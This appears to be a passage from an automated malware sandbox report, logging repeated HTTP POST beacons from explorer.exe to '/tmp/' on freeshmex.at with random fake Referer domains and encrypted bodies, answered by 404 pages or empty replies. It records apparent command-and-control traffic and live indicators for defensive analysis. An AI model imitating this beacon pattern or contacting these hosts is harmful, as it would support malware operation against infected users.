                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.44972495.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:34.343410969 CET1809OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uphkrwii.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 197
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:34.343518972 CET1809OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 3b 33 c5 a6
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu;3CsWlPNY8@d><pD/MNLXnfH_`Gh[{-+l
                    Nov 24, 2022 20:13:34.497175932 CET1810INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:34 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.449725109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:34.740168095 CET1811OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://mifwrnveyh.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 110
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:34.740305901 CET1811OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 34 4c ad fb
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu4LN`odg?i
                    Nov 24, 2022 20:13:34.972809076 CET1812INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:34 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.449726190.140.74.4380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:35.645670891 CET1813OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://motvx.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 259
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:35.645742893 CET1813OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 40 5a b8 80
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu@ZgFZbjRgtZ]Zf~( ,n*1\]J[J3{LlO$YkKc(T;Q+bG#qx-X
                    Nov 24, 2022 20:13:36.539628983 CET1814INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:36 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.449698211.40.39.25180C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:04.464222908 CET140OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jccvg.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 200
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:04.464287996 CET141OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2d 4e d8 91
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu-N`UCo49"-.]BT0q,}T^VZ!,75KpG!;.Sy*r+F
                    Nov 24, 2022 20:13:05.402805090 CET141INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:05 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.449727178.31.176.4280C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:37.610042095 CET1815OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bfgpwwck.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 116
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:37.610502005 CET1815OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 55 15 cd 81
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuU\FXXefJT@9;
                    Nov 24, 2022 20:13:37.977166891 CET1816INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:37 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.449728211.171.233.12980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:38.277184010 CET1817OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://agqugnol.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 337
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:38.277184010 CET1817OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 4a 36 dc 8b
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuJ6dNi~|wqyV<8cM\qVCtPC/Nb4M8yUxVa%WZBX<^|&rz6XCnu|4>+
                    Nov 24, 2022 20:13:39.528865099 CET1817INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:38 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.44972995.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:39.616995096 CET1818OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://gxxlrwdw.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 172
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:39.617022991 CET1818OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5d 49 cb bb
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu]IN\lX.f%?fY.vjV\k9Wl$A(b!=
                    Nov 24, 2022 20:13:39.801582098 CET1819INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:39 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.449730109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:39.882327080 CET1820OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jhiornjar.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 353
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:39.882327080 CET1820OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 31 00 ca 81
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu1GCXRml,/7EAIybJ'x$KijC+,M[O/7r\N##>h5Zv[lKy$R_4
                    Nov 24, 2022 20:13:40.187788963 CET1821INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:39 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.449731190.140.74.4380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:40.417757988 CET1822OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://sloljasy.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 116
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:40.420681953 CET1822OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 2b 5e d1 87
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu+^PoB]6:s]d);
                    Nov 24, 2022 20:13:41.290025949 CET1823INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:40 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.449732109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:41.379910946 CET1824OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://yrxav.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 263
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:41.382425070 CET1824OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 61 03 f1 8f
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuajXLGTTPu0__XB63[ Y"OAWpL'r_kcor((/;J"mpwMxHWU3DP.6J(~
                    Nov 24, 2022 20:13:41.702302933 CET1825INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:41 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 